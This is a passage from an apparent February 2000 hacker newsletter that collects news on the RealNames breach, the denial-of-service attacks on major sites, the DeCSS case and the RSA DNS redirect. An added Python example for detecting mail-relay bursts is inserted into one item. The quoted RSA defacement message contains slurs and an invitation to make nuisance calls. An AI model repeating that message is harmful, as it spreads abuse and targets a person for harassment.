      CCs Stolen From RealNames? 
      by Lynn Burke 

      10:30 a.m. 11.Feb.2000 PST

      Internet search tool company RealNames
      has become the latest site to be cracked by Internet vandals -- only this 
      time tens of thousands of customer credit cards and passwords may have 
      been stolen. 

      RealNames CEO Keith Teare said the San Carlos, California company 
      discovered the intruder late Wednesday afternoon, when user searches for 
      company names were suddenly all routed to www.188.net, a site written 
      entirely in Chinese and believed to be associated with the Chinese
      government. 

      "I think it's probably just random," he said. "It was just a wakeup call 
      saying 'Hey, I'm here.'" 

      Teare said a security audit showed someone had gained access to the 
      front-end of the company's system, and admitted the intruder -- who is
      believed to be working from China -- had been there for at least several 
      days prior. 

      Credit card companies have been notified of the security breach, and so 
      far, no one has reported any fraud associated with the RealNames break-in. 

      The company has since updated its security, and says it is confident a 
      similar incident will not happen in the future. And despite what Teare 
      calls a "state of the art" security system that was in place before the 
      break-in, he admits there may have been some weak links.

      "I think it would be dishonest to say no, there's nothing we could have 
      done. You can always do more," he said. "We're pretty water-tight from an 
      industry standard, but you can never be diligent enough." 

      RealNames sent a letter out early Friday to customers informing them of 
      the break-in. 

      The email linked the attack on its company to the spate of denial of 
      service attacks that have struck major Internet companies like Yahoo and 
      Amazon. 

      "You may have heard, through recent and widespread media coverage, that 
      several Internet companies have been plagued by the irresponsible and 
      malicious activities of so-called 'hackers,'" the email read. "RealNames, 
      unfortunately, has also fallen victim to this."

      But asked on Friday whether he thought a connection existed, Teare said 
      no. 

      "I don't want to speculate, but probably not," he said. 

      Computer security expert Elias Levy agrees. 

      "I would say they seem to be unrelated," he said. "But it does bring home 
      the point that during the last two months there's been a barrage of 
      security breaks, from CD Universe to the denial of service attacks." 

      "Now that Y2K is over, people need to shift their strategy," he said. 
      "There needs to be more investment on security technology, and 
      non-technological means to mitigate the risk." 

      @HWA

      
41.0  HNN: Feb 14th:  Hacker Hijack or Misconfigued Server? 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Ted 
      Envisioneering Group, a Long Island technology
      consulting company, claimed that one of its servers was
      hijacked on two separate days to launch a denial of
      service attack on a major Web site. This particular
      denial of service attack was done with large volumes of
      email. Envisioneering Group President Richard Doherty
      claimed that their servers were 'hijacked by hackers'.
      (Sounds like a misconfigured mail server that allowed
      spam relays to me.) 

      CNN       
      http://www.cnn.com/2000/TECH/computing/02/11/cyber.attacks.01/index.html
      
      Consulting firm says its server was
      used to attack AOL
 
      February 11, 2000
      Web posted at: 6:57 p.m. EST (2357 GMT)
 
      From Interactive Technology Editor D. Ian Hopper and
      Justice Correspondent Pierre Thomas
 
      NEW YORK (CNN) -- Envisioneering Group, a Long Island technology
      consultant, told CNN on Friday that one of its servers was hijacked on two
      separate days to launch a version of a denial of service attack on a major
      Web site. 
 
      In such assaults, hackers hijack multiple third-party computers and use those
      "zombie" computers to flood target sites with data, essentially shutting down
      access to the sites for would-be users. 
 
      The first intrusion was on January 29 and involved using a computer to pass
      large volumes of e-mail from a third party on to a Web site server in an
      attempt to overwhelm the site. 
 
      In the span of 15 minutes, several dozen
      e-mails a second were sent through the
      Envisioneering server to both Yahoo! and
      America Online. 
 
      During the attack, engineers at Envisioneering
      stopped the attack, according to
      Envisioneering Group President Richard
      Doherty. 
 
      "We dumped all the pending mail, and that
      stopped the repeated attacks [on
      Envisioneering]," Doherty said. 
 
      Yahoo! was jammed by messages on Monday.
 
      The Envisioneering server was used again in the
      same fashion on Tuesday, a day when highly
      trafficked Internet sites such as Amazon.com,
      Buy.com and CNN.com were hit with denial
      of service attacks. 
 
      But in the second incident involving his server,
      Doherty says he doesn't know exactly where
      the messages were sent. 
 
      AOL: Assault didn't amount to a
      pinprick 
 
      The first attack could have been a form of target practice to confirm that the
      Envisioneering server was vulnerable with the intention of using it in the later
      attack. 
 
      AOL, for its part, reported no out of the ordinary traffic on either of the
      dates cited by Doherty. The attack had no effect on the huge Internet service
      provider, an AOL spokeswoman said. 
 
      Envisioneering uses Mindspring for its Internet access. But even if a hacker
      somehow gained control of the entire Mindspring network and pointed it at
      AOL, it wouldn't "register a significant amount of volume to cause a
      problem," according to AOL spokesperson Tricia Primrose. 
 
      This is because of Mindspring's relatively small total bandwidth. With the
      known resources of the intruder -- one computer at Envisioneering Group --
      the assault didn't even amount to a pinprick, Primrose said. 
 
      Yahoo! did not immediately return calls for comment. 
 
      AOL has proposed buying Time Warner Inc., the parent company of
      CNN.com. It is awaiting approval from the Federal Trade Commission. 
 
      FBI zeroing in on locations in California, Oregon
 
      Meanwhile, CNN has learned the FBI is zeroing in on undisclosed locations
      in California and Oregon as it attempts to unravel this week's cyber assaults. 
 
      According to sources familiar with the investigations, the FBI is hoping to
      obtain computers that it believes were used in an attack on CNN.com. 
 
      No arrests are considered imminent. 
 
      The FBI's planned action comes after investigators discovered the computer
      system at the University of California at Santa Barbara was used in the
      attack against CNN.com. 
 
      As the smoke begins to clear from the spate of attacks, CNN continues to
      get sporadic reports about other major Web sites assaulted. 
 
      Excite@Home confirmed that it was attacked Wednesday night at 7 p.m.
      PST. The attack lasted about an hour, according to a spokesperson. About
      50 percent of users trying to access the Excite portal and search engine
      couldn't reach the site during the attack, which targeted and overloaded
      routers. Only the Web site was under attack, the @Home cable network
      was not affected.
 
      "We're working with the Internet community to try to find out what's going
      on," says Excite@Home spokesperson Kelly Distefano.
 
      Server compromised
 
      A University of California-Santa Barbara network administrator has
      confirmed that a server at the university was compromised and used in at
      least one of the attacks against major Web sites this week. 
 
      Sources declined to identify the owners of the computers that are being
      targeted. While those owners may emerge as suspects, sources point out
      that their computers might have been programmed without their knowledge. 
 
      Still, the belief is that these computers may have been used to direct
      commands to a computer system at UCSB. 
 
      This computer then flooded the affected Web site with millions of messages
      -- blocking access to customers. 
 
      UCSB administrator Kevin Schmidt said an intruder entered the UCSB
      machine at least twice. After entering the first time to open doors needed
      later, the intruder returned to install a software package designed to carry
      out an attack, Schmidt said. 
 
      The program, once executed, began its assault by sending out connection
      requests to the target Web site creating a "denial of service" attack. 
 
      With enough requests sent to a single Web site, the site can be rendered
      inaccessible to legitimate users. 
 
      In order to conceal the attack, the program began rotating the origination
      addresses of the requests. This method, known generally as "spoofing," is
      used to thwart filters on the target machine designed to identify and weed out
      malicious data. 
 
      Schmidt said the intruder was "sloppy" in his work and failed to destroy all
      the logs monitoring activity on the server. 
 
      "There wasn't a great effort to hide their presence," Schmidt said. "I don't
      think this behavior was atypical" of an untrained hacker. 
 
      How they did it
 
      The intruder entered the UCSB computer through a known vulnerability in
      an installed network service. 
 
      These vulnerabilities are frequently announced through Carnegie Mellon
      University's CERT group, National Infrastructure Protection Center and
      other network security forums. 
 
      To plug the holes, administrators simply need to install patches or
      workarounds. However, with so many individual machines on the Internet
      and other demands competing for the time of a network guru, many
      computers are left unsecured. 
 
      Along with CNN.com, other attacks were carried out against Yahoo!, eBay
      and Amazon.com. 
 
      As CNN has reported, the programs needed to make a denial of service
      attack are very simple to find on several Web sites. They are ready-made
      programs that are easy for almost anyone to use. 
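
      Added example, not part of the HNN or CNN text: a log check for the
      third-party relay burst described above. The log format, host
      names, addresses and the two-dozen-per-second threshold are
      constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed, simplified log format (not any real MTA's format):
#   <timestamp-to-the-second> client=<ip> from=<sender> to=<recipient>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) "
    r"from=<(?P<sender>[^>]*)> to=<(?P<rcpt>[^>]*)>$"
)


def domain(addr):
    """Return the lower-cased domain part of an address ('' if none)."""
    return addr.rpartition("@")[2].lower()


def find_relay_bursts(lines, local_domains, per_second_threshold):
    """Flag clients that push third-party mail through this server in bursts.

    A message counts as a third-party relay when neither the sender nor the
    recipient belongs to a local domain: the server has no business carrying
    it. A client is reported when its relayed messages in any single second
    reach per_second_threshold.
    """
    per_second = defaultdict(Counter)  # client -> {timestamp: relayed count}
    targets = defaultdict(Counter)     # client -> {recipient domain: count}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line, ignore
        if domain(m["sender"]) in local_domains:
            continue  # outbound mail from our own users
        if domain(m["rcpt"]) in local_domains:
            continue  # inbound mail for our own users
        per_second[m["client"]][m["ts"]] += 1
        targets[m["client"]][domain(m["rcpt"])] += 1

    findings = {}
    for client, counts in per_second.items():
        peak = max(counts.values())
        if peak >= per_second_threshold:
            findings[client] = {
                "peak_per_second": peak,
                "relayed_total": sum(counts.values()),
                "targets": dict(targets[client]),
            }
    return findings


def build_sample_log():
    """Constructed sample: normal traffic plus a two-second relay burst."""
    lines = [
        "2000-01-29T14:00:00 client=192.0.2.10 "
        "from=<staff@consultancy.example> to=<client@customer.example>",
        "2000-01-29T14:00:00 client=198.51.100.5 "
        "from=<partner@customer.example> to=<staff@consultancy.example>",
        # One stray relayed message: third-party, but far below the threshold.
        "2000-01-29T14:00:03 client=198.51.100.9 "
        "from=<list@news.example> to=<friend@other.example>",
    ]
    for second in (1, 2):
        for i in range(36):  # three dozen messages in each second
            rcpt = "portal-a.example" if i % 2 == 0 else "isp-b.example"
            lines.append(
                f"2000-01-29T14:00:0{second} client=203.0.113.7 "
                f"from=<x{i}@forged.example> to=<user{i}@{rcpt}>"
            )
    return lines


if __name__ == "__main__":
    report = find_relay_bursts(build_sample_log(), {"consultancy.example"}, 24)
    for client, info in report.items():
        print(client, info)
```

      A server that refuses mail when neither envelope address is local
      never produces these log lines in the first place; the check is for
      spotting a relay that is already being used this way.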
     
     @HWA
     
     
42.0  HNN: Feb 14th:   Windows 2000 Has 63,000 Bugs 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by warpathdoc 
      Reporters at Sm@rt reseller claim to have received an
      internal Microsoft memo that says that Windows 2000
      has 63,000 bugs. Windows 2000 is scheduled to ship in
      four days. Microsoft spokespeople said that "All
      software ships with issues." (I guess since everyone
      else does it that makes it OK?) 

      Sm@rt Reseller 
      http://www.zdnet.com/zdnn/stories/news/0,4586,2436920,00.html?chkpt=zdhpnews01
      
      @HWA
      
43.0  HNN:Feb 15th: Buffer overflow: DeCSS
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      The DeCSS case and how to change a
      Big Business (BB) in today's world


      By Dr. Z (Nigel Loring) 

      I have watched this case of legal muscling and
      intimidation and just had to comment with an attitude of
      "What are the hackers doing here?" This is BB vs.
      scattered and unfocussed "hackers". Who do I think will
      win? BB of course! Just look at the situation: BB wants to
      establish that they will punish anyone they want by using
      legal bullying tactics. They pick a small entity (the "little
      guy", a son and his father) with a "potential" impact on
      BB's business. It doesn't matter that the "potential"
      adverse effect is not real or logical. The business is
      playing on their own field of expertise, where they know
      the rules and the hacker community doesn't even read the
      rule book. The media love it and BB plays it for all its
      worth. After all, BB has labeled the little guy a "criminal", a
      nerd and a foreigner, and the people who would complain
      are those other nerdy guys (Linux users - and what place
      do they really have in the world high technology order -
      just esoteric). 

      Why do I say that BB will win? Just look at the comments
      in Slashdot's talk-back to the initial indictment: You can
      characterize them as whiny, uninformed, and petulant.
      Suggestions are made that boycotting of BB and
      donations to the little guy are the ways to help. Give me a
      break! Boycotts don't work unless you have an established
      big organization (Greenpeace, Sierra Club, NAACP, and
      the Christian Right come to mind). Donations from a few
      hundred (or 10's) of hackers don't merit any stories in any
      media (except in on-line talk-backs where they are buried
      by the high volume of ranting, raving, and novice legal
      opinions). 

      Let me call into question who wants to be called a hacker.
      Check out the L0pht's website and the definition they use.
      Their classic definition is the best and most rewarding:
      doing things (solving problems) in a way that was not
      intended or planned. For myself, I think you should "hack"
      life. Wozniak did it, Gates did it, the Internet originators
      did it, the guy who invented the spreadsheet did it, and
      the L0pht is doing it. Look at what they did - it was
      different and enjoyable, and with dedication, they made a
      difference. Yeah sure, one might get arrogant like Gates,
      but take a look at the others and the L0pht. They're in a
      different mold. 

      So, you have this case against reverse-engineering a
      trade secret and then showing everyone how to do it.
      Let's be brutally frank about it. The legal results are
      guaranteed: If you don't understand the game that is
      going to play out here, you're going to lose. Just slink
      away and let the legal people and BB play the game to get
      what they want. In my opinion, if I was a lawyer for BB I
      would be laughing at the ranting and raving going on by
      the "hackers", and the media's obvious siding with my
      client. I have a no lose situation. I can: Settle out of
      court before trial (BB wins and gags the "little guy");
      settle after starting the trial (BB wins by getting publicity
      that they will pursue by legal bullying anything that THEY
      think might hurt their interests); let the court decide (if
      BB loses, they WIN with a spin-doctoring that says they
      only lost by a technicality in Norway - and man, have
      they punished the little guy with his costs). There you
      have it - end of episode - a clear case of flipping a coin
      with the bet: "Heads I WIN, tails you LOSE." 

      But wait a minute. Aren't you hackers? Can't you see that
      if you learn the game you can change the way things are
      done and get the outcome YOU want? 

      You CAN hack big business and surprise the hell out of the
      CEOs and lawyers. They have a soft underbelly. When a
      company presses legal claims they are playing a high
      stakes game. Usually, they do not play that game unless
      they are pretty confident they can WIN. But sometimes
      they go wrong by underestimating the resourcefulness of
      their opponent and being arrogant. That's a deadly
      combination. 
      
      A classic case comes from years ago when the telephone
      company sued a guy in California for extending his phone
      with a home-made system to connect all the buildings on
      his farm. They claimed that he was setting up an
      exchange and only the phone company wanted to be able
      to do that. The phone company was arrogant and wanted
      to set the precedent that they owned all phone systems.
      They didn't expect that as a ham-radio operator he would
      get the National HAM Radio Operator's Club to support and
      defend him. The phone company lost big-time and this set
      the precedent that the phone company owns ONLY up to
      your property or the box going into your house. Inside,
      you can do whatever you like, so long as it doesn't
      interfere with the phone company's operations. I bet the
      phone company wishes it had never sued that ham-radio
      operator. 
      
      So, this is how you can do the same thing today to the
      DVD Consortium: 
      
      Did you know that owning one (1) share of any public
      stock entitles you (or your proxy) to attend and vote at
      the Annual Stockholders Meeting of that publicly held big
      business? Did you know that you can actually make a few
      statements on the record at those meetings? 
      
      Do you know that Mutual Fund Managers have forced big
      businesses to merge, not to merge (see P&G and
      Warner-Lambert talks in January) or do other business
      things because the Fund Manager has proxy control of
      large amounts of the big business's stocks? Did you know
      that each time big business's stock drops and you find
      that a big business Officer sold his stock just before the
      drop, you can sue him? Yes, you can, and it happens a
      LOT - you just don't hear about it. Big business almost
      always settles out of court before a trial (think they want
      to go to court when they can get rid of the annoyance by
      paying off the complainer - it's almost legal extortion - but
      the complainer has to lose money in the first place for the
      suit to have teeth.) 
      
      The only kicker is: The fewer proxies, the less influence.
      Now, you don't have much clout with one share. But what
      if you, and people who think like you, combine your
      proxies and vote as a block. THIS is power! THIS is what
      will make Big Business's CEO and other company officers
      take notice. THIS is charging onto the playing field with a
      rule book in your hand and power in your pocket. You
      WILL be noticed! You should also realize that only a
      fraction of the stockholders in a company ever assigns
      their proxies to someone; usually BB asks the stockholders
      for their proxies to vote what BB wants. So the
      stockholders meeting attendees represent only a part of
      the total shares in the company. Your block of shares
      then has more clout than you think. If you can get
      enough opposition to the mainline BB view, the Meeting
      notice can even state them. 
      
      It doesn't have to stop there either. If you have a block
      of votes, then the media is going to take notice also. Just
      imagine the story: "Hackers, claiming ethical and economic
      reasons, plan to attend Annual Stockholders Meeting to
      voice opposition to BB's DVD policies." Imagine BB's CEO
      seeing that in his favorite media. That's delicious and
      legal. 
      
      OK, you say you can't get hackers to descend on BB at
      the right time (work schedules, travel, distances, costs).
      PLAY the game. Hack the rules. (Remember, this doesn't
      mean break the rules - just apply them in a different way
      that no one thought of before.) You have proxies - pool
      them! Find a well-respected and ethical organization and
      set up an account that holds stock owned by individuals.
      The sole purpose of the account is non-profit and to vote
      the proxies of that stock as a block. Have ONE person
      with those proxies show up at the meeting. Broadcast it.
      Call up the company and tell them what you plan to do (I
      smile when thinking of that phone call to the Investor
      Relations Department of BB). Remember, the Securities and
      Exchange Commission, which allowed the company to raise
      a lot of money by going public, makes BB play by SEC
      rules. If you understand computers you can understand
      the SEC rules. (Ha! Think the lawyers, who study the SEC
      rules, know computers like a hacker does? No Way. The
      lawyers have to hire outside experts --- Hmmm, maybe
      friends of yours.) 

      The beauty of this is that each of you still owns your
      shares of stock. You aren't donating all that money to
      anyone! Later, you can have the stock sold and get
      almost all the money back. 

      Let's look at examples of costs to you: If the Holding
      Company sells it on-line, you might lose a few cents.
      Think of it this way: Honest (and savvy) Holding Company
      sells 1000 shares at $100/share through an on-line broker
      for < $10. If the 1000 shares came from 1000 people then
      the per person cost of the sale would be $0.01! Note that
      the transaction is $100,000 total, but Holding Company
      only expensed $10 total. One on-line broker lets you trade
      up to 5000 shares for <$10. (If you had 5000 shares of
      MSFT (~$100/share) that would be $500,000 traded for
      <$10.) Ahh, the beauty of on-line brokers! Do you feel
      that this cause is worth 1 cent? Now, I know that the
      Holding Company will have some operating expenses too,
      but that can be worked out to cover expenses with full
      disclosure guaranteed. This should be a cause, not a plan
      to make anyone money. 

      Here's another angle in the hack. Your holding company
      can sell all but a small number of the shares in BB #1 after
      the Stockholder's Meeting and buy a lot of BB #2 to get
      ready for BB #2's Stockholder's Meeting. You can rotate
      through a number of them. When you get what you want,
      you cash out. That's what big business would do. Gee,
      isn't that ironic, and a pretty good hack. 

      One noteworthy point at this juncture would be to
      highlight the fact that investment clubs are regulated -
      they are not just informal groups of investors. There is
      paperwork that needs to be filed. For help starting up your
      own investment club, The Motley Fool
      (http://www.fool.com/) has lots of resources that may be
      of assistance. In particular, the "Investment Club" section
      of the Motley Fool may be of interest. 

      Who knows, what you made the company do might please
      other stock investors and you might sell at a profit. But,
      what you've done could also hurt the company's image
      and cause the stock to go down. Ha! (This is where
      you've got to smile.) You will have BB's officers trying
      their hardest to not let the stock drop -- they're working
      in YOUR (a stockholder) best interests (actually they're
      trying to keep their stock options positive and they
      personally lose money if the stock drops). Isn't it funny,
      that while you fight for your cause, they can be fighting
      to not let you (a stockholder) lose any money! Now,
      that's justice! 

      Well, that's the plan. Play the game - Hack life. Use the
      media, don't let them always use you. Don't just vent your
      displeasure on the talk-back, on-line magazines. Make a
      difference! 
      
      @HWA
      
44.0  HNN: Feb 15th:  Suspects Sought in DDoS Attacks 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Amazing how this has made such big news, fix your routers
      boys!! - Ed
      
      contributed by janoVd 
      According to unnamed ``sources familiar with the
      investigation'' the FBI is preparing to question at least
      two suspects. Coolio and mafiaboy may soon be
      subjected to FBI interrogation. (There is very little in
      the way of confirmable information in this article.
      Please take that into account when reading it.) 

      Washington Post         
      http://www.washingtonpost.com/wp-dyn/business/A51397-2000Feb14.html

      By Ariana Eunjung Cha
      
      and John Schwartz
      
      Washington Post Staff Writers
      
      Tuesday, February 15, 2000; Page E1
      
      Federal agents chasing the hackers who brought down a string of high-profile
      Web sites are preparing to question several suspects in the case, sources
      familiar with the investigation said yesterday.
      
      One of those people, "Coolio," is located in the United States, the sources
      said. That is also the name used by a person who early Sunday defaced a company
      Web site for one of the most trusted names in the security business. A second
      is allegedly a Canadian teen known online as "mafiaboy." And a third is a male
      who allegedly "confessed" to a staff member of the popular security site
      Attrition.org.
      
      Law enforcement officials and independent cyber-sleuths have been able to link
      the online aliases to real names and addresses, and FBI agents are expected to
      begin questioning them as early as today.
      
      Meanwhile, representatives of some of the biggest high-tech businesses are
      scheduled to gather at the White House at 11 a.m. The companies have agreed to
      jointly call for a voluntary, industry-led coalition that will share
      information on cyber-attacks and how to respond to them--a step that security
      experts hailed as critical to discouraging future attacks.
      
      The person suspected of mounting the first attacks was named in a three-page
      e-mail sent to FBI agents late Wednesday by two computer experts, David Brumley
      of Stanford University and Joel de la Garza of Securify.com, a security company.
      
      The two men analyzed the log files from several of the recent "denial of
      service" attacks--which involved bombarding Web sites with so many requests for
      information that legitimate users were effectively shut out--and traced them
      back to a single individual. Brumley, a 24-year-old security administrator for
      the school, says they were able to quickly discover the person's online alias
      and his physical location down to the city.
      
      He said the attacker appeared to have significantly modified programs that are
      widely available on the Internet.
      
      "I think this guy is more sophisticated than a script-kiddie," Brumley said
      yesterday. "But he's not a computer-science genius. . . . Chances are it's
      someone who is either in college and has taken several computer-science classes
      or is a professional in the industry. We are seeing that the guy knows what
      he's doing."
      
      Brumley also said his analysis shows that it's likely that the attacks--which
      in addition to Yahoo and eBay hit sites including Amazon.com, CNN.com and
      Buy.com--were carried out by at least two groups because they used different
      strategies.
      
      Still, other experts point out that some popular attack programs often mix the
      two attack strategies because each exploits different vulnerabilities in a
      network. Indeed, company officials have said ZDNet and Buy.com were hit by both
      types of attacks simultaneously.
      
      This weekend, hackers manipulated an entry in a database that matches Internet
      addresses to their legitimate home pages so that www.rsa.com--the main page for
      RSA Security, a leader in the encryption business--would point to a mock site
      in the South American country of Colombia. The dummy page contained the words
      "Owned by Coolio" and linked to a recent RSA press release, "RSA Laboratories
      Unveils Innovative Countermeasure To Recent 'Denial of Service' Hacker Attacks."
      
      The second potential suspect--"mafiaboy"--is likely a copycat attacker,
      according to Michael Lyle of Recourse Technologies Inc. in Palo Alto, Calif.
      
      Last week, mafiaboy showed up on one of the many Internet Relay Chat channels
      frequented by hackers and sparred with the other visitors.
      
      "We entered into a number of conversations with mafiaboy and we saw him asking
      for suggestions on what sites to attack and after someone would suggest a site,
      that site would go down," Lyle said.
      
      Lyle declined to provide the log files for his conversations with the alleged
      hacker but another person investigating mafiaboy's connection to the attacks
      offered a brief transcript.
      
      Making a bilingual play on the word "packet"--the term for the uniform chunks
      of information that computers on the Internet break data into for sending--the
      hacker joked about being rumored to be the "Canadian pacquet monkey" and that
      he was responsible for paralyzing some of the high-profile sites. He mused
      profanely about how heavily the discussion might be monitored and said "better
      stop talkin . . . say nothing, know nothing, be nowhere."
      
      A third possible attacker being investigated by the FBI is a male who has
      engaged the people in Attrition.org in e-mail messages and chats and bragged
      about his victories, the sources said.
      
      In e-mail sent last week to one of the people who run the site, the hacker
      states: "If you notice the targets, They are all PUBLICLY traded companies,
      This was an attempt to put a 'Scare' into internet stock holders, Also, Attacks
      WILL be carried out against Online trading companies, Dow, Onlinetrade,
      E-Trade, etc."
      
      Brian Martin, an independent security expert, said that, historically, multiple
      groups have been involved in high-profile cyber-crimes. "Copycatting and
      copying style is very common," he said.
      
      A source involved in the federal investigation declined to say whether any
      suspect was under special scrutiny but said: "It is fair to say we're tracking
      down anyone taking credit for it."
      
      Law enforcement officials cautioned, however, that their intention to interview
      the people who have emerged in the investigation does not mean they are
      necessarily solid suspects in the case.
      
      Attorney General Janet Reno and FBI Director Louis J. Freeh are scheduled to
      appear before Congress tomorrow to discuss the hacker case and the overall
      problem of computer crime and cyber-terrorism. Meanwhile, one law enforcement
      official cautioned yesterday that authorities don't expect to complete the
      hacker probe any time soon and are "planning for a long investigation."
      
      Rloxley, a "white hat" hacker who maintains the "hackphreak" channel on
      Internet Relay Chat, scoffed at the notion that "mafiaboy" could pull off such
      an ambitious series of attacks: "Mafiaboy wishes that it was mafiaboy."
      
      The rush by some companies to capitalize on publicity and service as a result
      of the attacks--especially security firms attempting to find and reveal the
      hacker--has some observers worried.
      
      "We're seeing companies with no investigative background going to the press
      even before they go to the police! It would be a shame to see someone not get
      caught because the security companies are trying to one-up each other," said
      John Vranesevich, who owns the hacker-tracking AntiOnline site.
      
      The text of the joint statement by high-tech companies steers away from any
      proposal that might be cause for overly invasive monitoring of the nation's
      computer networks by law enforcement, but it recalls the efforts undertaken by
      industry to meet the challenge of the Y2K problem. Many in the business
      community say the Y2K fix-up effort was a model of the kind of public-private
      partnership that could be effectively applied to computer security.
      
      According to one participant in the planning of the event, the Clinton
      administration will make similar recommendations.
      
      Some Internet security experts, however, suggested that today's summit will not
      deliver much.
      
      "I think it is mostly harmless," said Sean Donelan, a former researcher at AT&T
      Laboratories now at California-based Equinix. Donelan noted that the attendees
      are largely corporate types and not techies: "They'll have their pictures
      taken, and more than likely the government officials won't even stay for the
      whole meeting. The White House probably doesn't have enough power outlets if
      everyone brought their laptop," he joked.
      
      Staff writer David A. Vise contributed to this report.
      
                            (c) 2000 The Washington Post Company
      @HWA
      
45.0  HNN:Feb 15th:Hackers Invited to Summit
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
 
      contributed by janoVd 
      
      20 executives from technology companies, as well as academics and
      officials from the National Security Agency, were invited to attend a
      technology summit with President Clinton. The summit hopes to look at
      ways to tighten security on the World Wide Web. One of the invitees is
      Mudge, a hacker from the security consulting company @Stake.
      
      Associated Press - via Boston Globe
      http://www.boston.com/dailynews/046/economy/Clinton_taking_up_Web_security:.shtml
      
      (404)
      
      
      @HWA

 

46.0  HNN:Feb 15th:Stacheldraht Author Retires
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 

 
      contributed by randomizer 
      
      The author of the DDoS tool Stacheldraht, Randomizer, told HNN today
      that he will not continue his work in the field and will not start
      developing on the next version of Stacheldraht called Blitzkrieg. "All
      that media hype is too much for me. I do not want to be the scapegoat
      for the security agencies, only cause some people abuse the tools I
      wrote," Randomizer said early on Tuesday. He indicated that he wants
      now to focus more on his "real life".
      
      Heise - German
      http://www.heise.de/newsticker/data/pab-15.02.00-000/
       
      @HWA
      
       
      
47.0  HNN:Feb 15th:CNN News Chat with Clinton Compromised?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/      
       
      contributed by cult hero
      
      In an email statement to the White House, CNN News admitted that someone
      was able to bypass the filters they had put in place for an online chat
      with the President. The presidential impostor then said "Personally,
      I'd like to see more porn on the Internet, Wolf how about you?" in
      response to a question about Clinton's thoughts on the Internet. Fox
      News has labeled the incident a prank and has refused to say that they
      were hacked. (Sounds like a simple net split, doesn't even rank as a
      prank.)
      
      Fox News
      http://www.foxnews.com/vtech/021400/hack.sml
      (404)
      
      @HWA
      
48.0  HNN:Feb 15th:RSA Web Page Redirected
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
       
      contributed by Weld Pond 
      
      Encryption security firm RSA had an older web page redirected to a site
      calling for more lax export controls on encryption products. It would
      appear that RSA did not even have password authentication set up on its
      DNS entries.
      
      ZDNet
      http://www.zdnet.com/zdnn/stories/news/0,4586,2437384,00.html
      
      The Register
      http://www.theregister.co.uk/000214-000025.html
      
      RSA Security site defaced

      Computer criminals, keen to make a point
      about the insecurity of Domain Name System
      authentication, hit an older site maintained
      by the network security provider.



      By Will Knight, ZDNet (UK)
      February 14, 2000 11:21 AM PT 


      Another Web attack, this time on encryption security
      firm RSA.

      Computer security firm RSA Security Inc. (Nasdaq:
      RSAS) had one of its Web sites effectively defaced by
      computer criminals apparently keen to make a point
      about the insecurity of DNS (Domain Name System)
      authentication. The affected site is an older RSA site, not
      its primary home page. 

      According to security and encryption expert Brian Galdman,
      the culprits appear to have gained access to a high-level
      DNS server rather than broken into the server that holds
      the page itself.

      This latest high-profile attack adds
      to the argument that, as illustrated by the recent spate of
      distributed denial-of-service attacks, there remain major
      security issues -- even for the best-equipped Web sites.

      Pointer page defaced
      By noon on Monday, http://www.rsa.com led to a defaced
      page with a virtually incoherent message. However, the
      server on which the Web site exists hasn't been hacked:
      The domain name simply points to another IP address. A
      spokesman for RSA said that http://www.rsa.com is RSA
      Security's old Web site, which is maintained as "a
      pointer" to the official Web site at
      http://www.rsasecurity.com. 

      Although hacks on DNS servers aren't unknown,
      Galdman said the problem points to more
      serious issues with the Internet's infrastructure.
      He said that if these malicious computer
      hackers have access to enough DNS servers
      they could, in theory at least, "take down the whole
      Internet." 

      The target is probably no coincidence, Galdman said.
      Attacking a firm specializing in encryption may illustrate
      dissatisfaction with the U.S. government for restricting
      access to strong encryption, he said. "This shows the
      extreme folly of the U.S. government, in particular, in
      preventing technology that would prevent this sort of
      attack being deployed. They're making the point that
      they're not secure. Hopefully, someone will start asking
      why they're not." 

      The RSA site has now been pulled down. A company
      spokesman said it will be about 24 hours before it goes
      live again. 

      Several groups have proposed a more secure form of
      DNS, but none has yet been implemented. For example,
      RFC 2137, first proposed in April 1997, outlines a method
      to use digital signatures to ensure that only authorized
      persons can update a DNS record. 
      
      
      -=-
      
      Posted 14/02/2000 7:37pm by Thomas C. Greene in Washington

      Internet security firm RSA's Web site hacked

      RSA Security has suffered the embarrassment of having its home page 
      "defaced" by an intruder.

      The original defaced page can be found at 
      http://www.2600.com/hacked_pages/2000/02/www.rsa.com/

      Now it gets complicated: there is a second defaced RSA home page,
      in which the company's site appears to be "owned" by an
      intruder. This is a plain white page bearing a simple message.

      However, the IP address of RSA.com (205.181.76.22) and the IP address of
      the second "hacked" page (200.24.19.252) -- are not the same.

      The hacked page, a computer security firm employee writes, is on a
      "computer in the University of Antigua -
      (http://bachue.udea.edu.co/).

      So what happened? One theory put forward by a very knowledgeable reader is
      that "the nameserver was hacked and the www.rsa.com IP forwarded to
      another hacked box which was used to host the defaced page. This box must
      have been hacked again, by someone else and a new page put up".

      The Register found the following text on the new defaced page (we've
      deleted part of the phone number for obvious reasons),

      "Wat up whats up to all my nigs ya know who ya are n #2600 and whats up 
      all my #sesame nigs and call       rigger if ya come here bc he is the 
      gayest fuck ;) 718-815-**** all chans are on a irc server lol -tek pBK > * 
      also irc.segments.org ;)"

      
      For those not fluent in h4x0r dialect, the gentleman or lady who hacked 
      the RSA page wishes to offer warm salutations to all of his or her 
      colleagues from the IRC channels #2600 and #sesame, and further invites 
      all concerned to place nuisance phone calls to a gentleman or lady known 
      as rigger (a notorious hacker, apparently), either as a friendly prank,
      or for malicious purposes. The overall tone suggests the former is 
      intended.

